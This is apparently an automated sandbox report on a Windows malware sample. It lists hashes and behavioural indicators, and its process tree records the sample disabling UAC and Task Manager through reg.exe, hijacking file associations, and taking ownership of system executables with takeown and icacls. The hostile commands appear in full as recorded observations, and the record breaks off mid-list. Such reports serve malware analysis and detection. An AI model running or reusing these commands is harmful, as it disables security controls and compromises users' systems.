Analysis
-
max time kernel
93s -
max time network
94s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
07-11-2024 11:24
Static task
static1
Behavioral task
behavioral1
Sample
ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe
Resource
win10v2004-20241007-en
General
-
Target
ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe
-
Size
409KB
-
MD5
b23232263d0ff718419df3180d3d8670
-
SHA1
194d700b79d7ffa681aaad1fd5010d788a4713ee
-
SHA256
ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781
-
SHA512
7c478b9cf4556539d8cd2a9165d11558a9957f7dc9ae25bd2380c02fa01e37061b6e5717d978eae87e7b074524b390d7f6a78d238240e3e1ffc45a259227c553
-
SSDEEP
6144:YQMmbjV28okoS4oImBvIEtTawRbvbKw4IPCFRvzvU+Yrw:YWoioS/Z6H
Malware Config
Signatures
-
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Disables Task Manager via registry modification
-
Possible privilege escalation attempt 64 IoCs
Processes:
icacls.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exepid process 4568 icacls.exe 1800 takeown.exe 2248 takeown.exe 1464 icacls.exe 2348 icacls.exe 1636 icacls.exe 5116 icacls.exe 3600 takeown.exe 1212 icacls.exe 3496 icacls.exe 916 icacls.exe 440 takeown.exe 2904 takeown.exe 5088 takeown.exe 4424 icacls.exe 1472 icacls.exe 3036 takeown.exe 1348 icacls.exe 3140 takeown.exe 2440 takeown.exe 4560 icacls.exe 1700 icacls.exe 2820 takeown.exe 4552 icacls.exe 2760 takeown.exe 1064 takeown.exe 1920 takeown.exe 1528 takeown.exe 1748 takeown.exe 1940 icacls.exe 1876 takeown.exe 3896 takeown.exe 4484 icacls.exe 1780 takeown.exe 4440 takeown.exe 1556 takeown.exe 940 icacls.exe 4528 takeown.exe 4488 takeown.exe 4784 icacls.exe 980 icacls.exe 3632 icacls.exe 2212 icacls.exe 3460 takeown.exe 3892 icacls.exe 2820 takeown.exe 1952 icacls.exe 224 takeown.exe 4280 icacls.exe 1844 takeown.exe 2680 takeown.exe 3960 takeown.exe 1304 icacls.exe 2736 takeown.exe 1684 takeown.exe 3844 icacls.exe 1544 takeown.exe 5004 icacls.exe 4888 takeown.exe 4092 icacls.exe 2712 takeown.exe 392 icacls.exe 3396 takeown.exe 3712 takeown.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe -
Modifies file permissions 1 TTPs 64 IoCs
Processes:
takeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exepid process 4860 takeown.exe 1616 takeown.exe 3896 takeown.exe 2248 takeown.exe 1700 icacls.exe 1732 takeown.exe 4280 icacls.exe 1556 takeown.exe 2248 takeown.exe 4200 takeown.exe 3680 icacls.exe 3312 icacls.exe 2772 takeown.exe 2104 takeown.exe 1688 takeown.exe 4560 icacls.exe 3088 icacls.exe 1612 takeown.exe 2668 icacls.exe 2348 icacls.exe 1876 takeown.exe 2076 icacls.exe 4276 takeown.exe 1368 takeown.exe 1612 takeown.exe 2512 icacls.exe 3556 icacls.exe 1348 icacls.exe 1420 icacls.exe 2924 takeown.exe 4688 icacls.exe 392 icacls.exe 2784 takeown.exe 2212 icacls.exe 980 icacls.exe 2728 takeown.exe 1524 icacls.exe 2736 takeown.exe 3588 icacls.exe 868 takeown.exe 1468 icacls.exe 4336 icacls.exe 3688 icacls.exe 928 takeown.exe 3412 takeown.exe 1800 takeown.exe 2076 icacls.exe 3328 icacls.exe 1392 icacls.exe 3608 takeown.exe 2668 icacls.exe 3932 icacls.exe 5004 icacls.exe 3180 icacls.exe 4500 takeown.exe 3900 icacls.exe 3036 takeown.exe 1544 takeown.exe 3248 takeown.exe 3924 icacls.exe 2024 takeown.exe 764 icacls.exe 3940 icacls.exe 928 icacls.exe -
Modifies system executable filetype association 2 TTPs 1 IoCs
Processes:
ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe BATCF %1" ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe -
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
-
Drops file in System32 directory 1 IoCs
Processes:
ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exedescription ioc process File opened for modification C:\Windows\System32\Taskmgr.exe ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 10 IoCs
Processes:
ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe BATCF %1" ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe HTMWF %1" ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\rtffile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe RTFDF %1" ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe NTPAD %1" ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inffile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe NTPAD %1" ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe NTPAD %1" ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe CMDSF %1" ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\giffile\shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe JPGIF %1" ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\VBSFile\Shell\Open\Command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe VBSSF %1" ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe NTPAD %1" ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe -
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 21 IoCs
Processes:
ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exepid process 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exepid process 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
Processes:
ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exedescription pid process Token: SeDebugPrivilege 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe Token: SeTakeOwnershipPrivilege 4500 takeown.exe Token: SeTakeOwnershipPrivilege 3504 takeown.exe Token: SeTakeOwnershipPrivilege 4748 takeown.exe Token: SeTakeOwnershipPrivilege 1080 takeown.exe Token: SeTakeOwnershipPrivilege 5028 takeown.exe Token: SeTakeOwnershipPrivilege 3064 takeown.exe Token: SeTakeOwnershipPrivilege 2700 takeown.exe Token: SeTakeOwnershipPrivilege 4116 takeown.exe Token: SeTakeOwnershipPrivilege 3460 takeown.exe Token: SeTakeOwnershipPrivilege 2760 takeown.exe Token: SeTakeOwnershipPrivilege 1616 takeown.exe Token: SeTakeOwnershipPrivilege 1844 takeown.exe Token: SeTakeOwnershipPrivilege 4528 takeown.exe Token: SeTakeOwnershipPrivilege 1544 takeown.exe Token: SeTakeOwnershipPrivilege 868 takeown.exe Token: SeTakeOwnershipPrivilege 4488 takeown.exe Token: SeTakeOwnershipPrivilege 1108 takeown.exe Token: SeTakeOwnershipPrivilege 2040 takeown.exe Token: SeTakeOwnershipPrivilege 3280 takeown.exe Token: SeTakeOwnershipPrivilege 2904 takeown.exe Token: SeTakeOwnershipPrivilege 1308 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exedescription pid process target process PID 4880 wrote to memory of 3172 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe reg.exe PID 4880 wrote to memory of 3172 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe reg.exe PID 4880 wrote to memory of 3628 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe reg.exe PID 4880 wrote to memory of 3628 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe reg.exe PID 4880 wrote to memory of 4500 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe takeown.exe PID 4880 wrote to memory of 4500 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe takeown.exe PID 4880 wrote to memory of 4560 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe icacls.exe PID 4880 wrote to memory of 4560 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe icacls.exe PID 4880 wrote to memory of 4748 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe takeown.exe PID 4880 wrote to memory of 4748 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe takeown.exe PID 4880 wrote to memory of 3844 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe icacls.exe PID 4880 wrote to memory of 3844 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe icacls.exe PID 4880 wrote to memory of 3504 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe takeown.exe PID 4880 wrote to memory of 3504 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe takeown.exe PID 4880 wrote to memory of 1940 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe icacls.exe PID 4880 wrote to memory of 1940 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe icacls.exe PID 4880 wrote to memory of 1080 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe takeown.exe PID 4880 wrote to memory of 1080 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe takeown.exe PID 4880 wrote to memory of 2196 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe icacls.exe PID 4880 wrote to memory of 2196 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe icacls.exe PID 4880 wrote to memory of 3064 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe takeown.exe PID 4880 wrote to memory of 3064 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe takeown.exe PID 4880 wrote to memory of 1032 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe icacls.exe PID 4880 wrote to memory of 1032 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe icacls.exe PID 4880 wrote to memory of 5028 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe takeown.exe PID 4880 wrote to memory of 5028 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe takeown.exe PID 4880 wrote to memory of 3680 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe icacls.exe PID 4880 wrote to memory of 3680 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe icacls.exe PID 4880 wrote to memory of 2700 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe takeown.exe PID 4880 wrote to memory of 2700 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe takeown.exe PID 4880 wrote to memory of 2520 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe icacls.exe PID 4880 wrote to memory of 2520 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe icacls.exe PID 4880 wrote to memory of 2760 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe takeown.exe PID 4880 wrote to memory of 2760 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe takeown.exe PID 4880 wrote to memory of 3524 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe icacls.exe PID 4880 wrote to memory of 3524 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe icacls.exe PID 4880 wrote to memory of 4116 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe takeown.exe PID 4880 wrote to memory of 4116 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe takeown.exe PID 4880 wrote to memory of 2568 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe icacls.exe PID 4880 wrote to memory of 2568 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe icacls.exe PID 4880 wrote to memory of 1616 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe takeown.exe PID 4880 wrote to memory of 1616 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe takeown.exe PID 4880 wrote to memory of 3892 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe icacls.exe PID 4880 wrote to memory of 3892 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe icacls.exe PID 4880 wrote to memory of 3460 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe takeown.exe PID 4880 wrote to memory of 3460 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe takeown.exe PID 4880 wrote to memory of 4568 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe icacls.exe PID 4880 wrote to memory of 4568 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe icacls.exe PID 4880 wrote to memory of 1844 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe takeown.exe PID 4880 wrote to memory of 1844 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe takeown.exe PID 4880 wrote to memory of 3440 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe icacls.exe PID 4880 wrote to memory of 3440 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe icacls.exe PID 4880 wrote to memory of 1544 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe takeown.exe PID 4880 wrote to memory of 1544 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe takeown.exe PID 4880 wrote to memory of 3164 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe icacls.exe PID 4880 wrote to memory of 3164 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe icacls.exe PID 4880 wrote to memory of 4528 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe takeown.exe PID 4880 wrote to memory of 4528 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe takeown.exe PID 4880 wrote to memory of 1468 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe icacls.exe PID 4880 wrote to memory of 1468 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe icacls.exe PID 4880 wrote to memory of 868 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe takeown.exe PID 4880 wrote to memory of 868 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe takeown.exe PID 4880 wrote to memory of 4784 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe icacls.exe PID 4880 wrote to memory of 4784 4880 ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe icacls.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe"C:\Users\Admin\AppData\Local\Temp\ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781N.exe"1⤵
- Checks computer location settings
- Modifies system executable filetype association
- Drops file in System32 directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4880 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f2⤵
- UAC bypass
- Modifies registry key
PID:3172 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
PID:3628 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\bfsvc.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4500 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\bfsvc.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4560 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\HelpPane.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4748 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\HelpPane.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3844 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\hh.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3504 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\hh.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:1940 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\splwow64.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1080 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\splwow64.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2196
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\winhlp32.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3064 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\winhlp32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1032
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\write.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5028 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\write.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:3680 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\SysWOW64\raserver.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2700 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\raserver.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2520
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\SysWOW64\msra.exe"2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:2760 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msra.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3524
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\SysWOW64\quickassist.exe"2⤵
